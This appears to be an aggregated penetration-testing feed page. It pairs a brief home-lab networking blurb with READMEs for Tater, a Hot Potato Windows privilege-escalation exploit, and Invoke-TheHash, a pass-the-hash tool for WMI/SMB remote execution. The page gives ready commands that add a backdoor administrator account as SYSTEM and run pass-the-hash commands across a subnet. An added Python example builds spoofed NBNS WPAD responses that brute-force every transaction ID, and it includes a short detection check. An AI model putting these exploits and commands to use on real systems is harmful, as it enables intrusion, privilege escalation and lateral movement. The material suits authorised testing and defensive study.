Home Lab – Networking

In this post I will cover the basic setup of the basic building-block network, which is a simple flat network behind a router acting as firewall, NAT, DHCP and VPN for the network.
The first action is to create a virtual switch that will provide connectivity for all the virtual machines in this flat network. Almost all virtualization solutions support a virtual switch under one name or another. Since I chose ESXi for my home lab, the commands shown will be for that platform, but in general terms the same can be done with Hyper-V or XenServer.
The main reason I'm showing all the steps via the command line is so that they can be automated later in a script if this is a process that will be repeated several times.

Link: http://www.darkoperator.com/blog/2017/2/4/home-lab-networking

Tater – A PowerShell implementation of the Hot Potato Windows Privilege Escalation Exploit

Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit.

Included in:
p0wnedShell – https://github.com/Cn33liz/p0wnedShell
PowerShell Empire – https://github.com/PowerShellEmpire/Empire
PS>Attack – https://github.com/jaredhaight/psattack

Functions

Invoke-Tater
The main Tater function.

Parameters
IP – Specify a specific local IP address. An IP address will be selected automatically if this parameter is not used.
SpooferIP – Specify an IP address for NBNS spoofing. This is needed when using two hosts to get around an in-use port 80 on the privesc target.
Command – Command to execute as SYSTEM on the localhost. Use PowerShell character escapes where necessary.
NBNS – Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofing.
NBNSLimit – Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofer limiting, which stops NBNS spoofing while the hostname is resolving correctly.
ExhaustUDP – Default = Disabled: (Y/N) Enable/Disable UDP port exhaustion to force all DNS lookups to fail in order to fall back to NBNS resolution.
HTTPPort – Default = 80: Specify a TCP port for the HTTP listener and redirect response.
Hostname – Default = WPAD: Hostname to spoof. WPAD.DOMAIN.TLD may be required by Windows Server 2008.
WPADDirectHosts – Comma-separated list of hosts to list as direct in the wpad.dat file. Note that localhost is always listed as direct.
WPADPort – Default = 80: Specify a proxy server port to be included in the wpad.dat file.
Trigger – Default = 1: Trigger type to use in order to trigger the HTTP to SMB relay. 0 = None, 1 = Windows Defender Signature Update, 2 = Windows 10 WebClient/Scheduled Task
TaskDelete – Default = Enabled: (Y/N) Enable/Disable scheduled task deletion for trigger 2. If enabled, a random string will be added to the task name to avoid failures after multiple trigger 2 runs.
Taskname – Default = Tater: Scheduled task name to use with trigger 2. If you observe that Tater does not work after multiple trigger 2 runs, try changing the task name.
RunTime – Default = Unlimited: (Integer) Set the run time duration in minutes.
ConsoleOutput – Default = Disabled: (Y/N) Enable/Disable real-time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
StatusOutput – Default = Enabled: (Y/N) Enable/Disable startup messages.
ShowHelp – Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
Tool – Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive PowerShell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire

Stop-Tater
Function to manually stop Invoke-Tater.

Usage
To import with Import-Module:
Import-Module ./Tater.ps1
To import using the dot source method:
. ./Tater.ps1

Examples
Basic trigger 1 example:
Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
Basic trigger 2 example:
Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
Two-system setup to get around port 80 being in use on the privesc target:
WPAD System – 192.168.10.100 – this system will just serve up a wpad.dat file that directs HTTP traffic on the privesc target to the non-80 HTTP port
Invoke-Tater -Trigger 0 -NBNS N -WPADPort 8080 -Command "null"
Privesc Target – 192.168.10.101
Invoke-Tater -Command "net user Tater Winter2016 /add && net localgroup administrators Tater /add" -HTTPPort 8080 -SpooferIP 192.168.10.100

Screenshots
Screenshot: Windows 7 using trigger 1 (NBNS WPAD Bruteforce + Windows Defender Signature Updates)
Screenshot: Windows 10 using trigger 2 (WebClient Service + Scheduled Task)
Screenshot: Windows 7 using trigger 1 and UDP port exhaustion

Download Tater
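The NBNS step that the NBNS and NBNSLimit parameters above control, as an added example that is not part of Tater or of the original post. A Windows host that cannot resolve WPAD over DNS broadcasts an RFC 1002 NAME QUERY whose 16-bit transaction ID a non-admin local process cannot sniff, so a single-host spoofer has to answer with every possible ID. The code below builds the query and the positive response for the WPAD name, shows the victim's acceptance rule (transaction ID and name must match), and includes the check a defender would run over captured NBNS traffic. All function names, the sample transaction ID, IP and TTL are this example's own choices.

```python
"""NBNS (RFC 1001/1002) packet helpers illustrating the WPAD spoofing step
of Hot Potato / Tater. Added example; not Tater's own code. The sample
transaction ID, IP address and TTL below are constructed values."""
import ipaddress
import struct

NB_TYPE = 0x0020                  # RR type NB (NetBIOS general name service)
IN_CLASS = 0x0001
FLAGS_QUERY_BROADCAST = 0x0110    # R=0, OPCODE=QUERY, RD=1, B=1
FLAGS_POSITIVE_RESPONSE = 0x8500  # R=1, OPCODE=QUERY, AA=1, RD=1, RCODE=0
NB_FLAGS_UNIQUE_BNODE = 0x0000    # G=0 (unique name), ONT=00 (B-node)
HEADER = struct.Struct("!HHHHHH") # NAME_TRN_ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT


def netbios_encode(name, suffix=0x00):
    """First-level encoding (RFC 1001 14.1): 15-byte space-padded name plus
    suffix byte, each byte split into two nibbles mapped onto 'A'..'P'."""
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    encoded = bytes(0x41 + nibble for b in raw for nibble in (b >> 4, b & 0x0F))
    return b"\x20" + encoded + b"\x00"   # label length 32, label, root label


def netbios_decode(wire):
    if len(wire) != 34 or wire[0] != 0x20 or wire[33] != 0x00:
        raise ValueError("not a first-level encoded NetBIOS name")
    enc = wire[1:33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_query(tid, name):
    """Broadcast NAME QUERY REQUEST, as a Windows host emits once DNS has failed."""
    return (HEADER.pack(tid, FLAGS_QUERY_BROADCAST, 1, 0, 0, 0)
            + netbios_encode(name) + struct.pack("!HH", NB_TYPE, IN_CLASS))


def build_positive_response(tid, name, ip, ttl=165):
    """POSITIVE NAME QUERY RESPONSE mapping name to ip (one NB_ADDRESS entry)."""
    rr = netbios_encode(name) + struct.pack("!HHIH", NB_TYPE, IN_CLASS, ttl, 6)
    rdata = struct.pack("!H", NB_FLAGS_UNIQUE_BNODE) + ipaddress.IPv4Address(ip).packed
    return HEADER.pack(tid, FLAGS_POSITIVE_RESPONSE, 0, 1, 0, 0) + rr + rdata


def parse_query(pkt):
    tid, flags, qdcount, *_ = HEADER.unpack_from(pkt, 0)
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not an NBNS name query")
    name, suffix = netbios_decode(pkt[12:46])
    return tid, name, suffix


def parse_response(pkt):
    tid, flags, _qd, ancount, *_ = HEADER.unpack_from(pkt, 0)
    if not flags & 0x8000 or ancount != 1:
        raise ValueError("not a single-answer NBNS response")
    name, suffix = netbios_decode(pkt[12:46])
    rtype, _rclass, ttl, rdlen = struct.unpack_from("!HHIH", pkt, 46)
    if rtype != NB_TYPE or rdlen != 6:
        raise ValueError("unexpected RR type or length")
    nb_flags, = struct.unpack_from("!H", pkt, 56)
    return {"tid": tid, "name": name, "suffix": suffix, "ttl": ttl,
            "unique": not nb_flags & 0x8000,
            "ip": str(ipaddress.IPv4Address(pkt[58:62]))}


def spoof_all_transaction_ids(name, ip):
    """A local, non-admin spoofer cannot read the victim's NAME_TRN_ID,
    so it sends one positive response per possible 16-bit ID."""
    for tid in range(0x10000):
        yield build_positive_response(tid, name, ip)


def matches_query(query_pkt, response_pkt):
    """The victim's acceptance rule: transaction ID and queried name must match."""
    q_tid, q_name, _ = parse_query(query_pkt)
    r = parse_response(response_pkt)
    return q_tid == r["tid"] and q_name == r["name"]


def is_wpad_answer(response_pkt):
    """Defender-side check: any NBNS answer for WPAD deserves review, since
    WPAD is expected to resolve over DNS on a correctly configured network."""
    try:
        return parse_response(response_pkt)["name"] == "WPAD"
    except ValueError:
        return False


if __name__ == "__main__":
    victim_query = build_query(0x4A17, "WPAD")   # constructed sample query
    hits = [p for p in spoof_all_transaction_ids("WPAD", "192.168.10.100")
            if matches_query(victim_query, p)]
    print(len(hits), parse_response(hits[0]))
```

Exactly one of the 65536 spoofed responses satisfies the victim's rule, which is why Tater keeps spoofing in a loop and why NBNSLimit exists to stop the flood once the name resolves to the spoofer's address. The rejected 65535 responses are also what a network sensor sees: a burst of WPAD answers from one host is the signature of this step.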

Link: http://feedproxy.google.com/~r/PentestTools/~3/SUCHCkSSeEE/tater-powershell-implementation-of-hot.html

Invoke-TheHash – PowerShell Pass The Hash Utils

Invoke-TheHash contains PowerShell functions for performing NTLMv2 pass-the-hash WMI and SMB command execution. WMI and SMB services are accessed through .NET TCPClient connections. Local administrator privilege is not required client-side.

Requirements
Minimum PowerShell 2.0

Import
Import-Module ./Invoke-TheHash.psd1
or
. ./Invoke-WMIExec.ps1
. ./Invoke-SMBExec.ps1
. ./Invoke-TheHash.ps1

Functions
Invoke-WMIExec
Invoke-SMBExec
Invoke-TheHash
ConvertTo-TargetList

Invoke-WMIExec
WMI command execution function.

Parameters:
Target – Hostname or IP address of target.
Username – Username to use for authentication.
Domain – Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
Hash – NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format.
Command – Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash have access to WMI on the target.
Sleep – Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds.

Example:
Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

Invoke-SMBExec
SMB (PsExec) command execution function supporting SMB1, SMB2, and SMB signing.

Parameters:
Target – Hostname or IP address of target.
Username – Username to use for authentication.
Domain – Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
Hash – NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format.
Command – Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash have access to SCM on the target.
CommandCOMSPEC – Default = Enabled: Prepend %COMSPEC% /C to Command.
Service – Default = 20 Character Random: Name of the service to create and delete on the target.
SMB1 – (Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target.
Sleep – Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds.

Example:
Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

Invoke-TheHash
Function for running Invoke-WMIExec and Invoke-SMBExec against multiple targets.

Parameters:
Type – Sets the desired Invoke-TheHash function. Set to either WMIExec or SMBExec.
Targets – List of hostnames, IP addresses, or CIDR notation for targets.
TargetsExclude – List of hostnames and/or IP addresses to exclude from the list of targets.
PortCheckDisable – (Switch) Disable WMI or SMB port check. Since this function is not yet threaded, the port check serves to speed up the function by checking for an open WMI or SMB port before attempting a full synchronous TCPClient connection.
PortCheckTimeout – Default = 100: Set the no-response timeout in milliseconds for the WMI or SMB port check.
Username – Username to use for authentication.
Domain – Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
Hash – NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format.
Command – Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash have access to WMI or SCM on the target.
CommandCOMSPEC – Default = Enabled: SMBExec type only. Prepend %COMSPEC% /C to Command.
Service – Default = 20 Character Random: SMBExec type only. Name of the service to create and delete on the target.
SMB1 – (Switch) Force SMB1. SMBExec type only. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target.
Sleep – Default = WMI 10 Milliseconds, SMB 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds.

Example:
Invoke-TheHash -Type WMIExec -Targets 192.168.100.0/24 -TargetsExclude 192.168.100.50 -Username Administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0

ConvertTo-TargetList
Converts Invoke-TheHash output to an array that contains only targets discovered to have Invoke-WMIExec or Invoke-SMBExec access. The output from this function can be fed back into the Targets parameter of Invoke-TheHash.

Download Invoke-TheHash

Link: http://feedproxy.google.com/~r/PentestTools/~3/egsf10eEzi0/invoke-thehash-powershell-pass-hash.html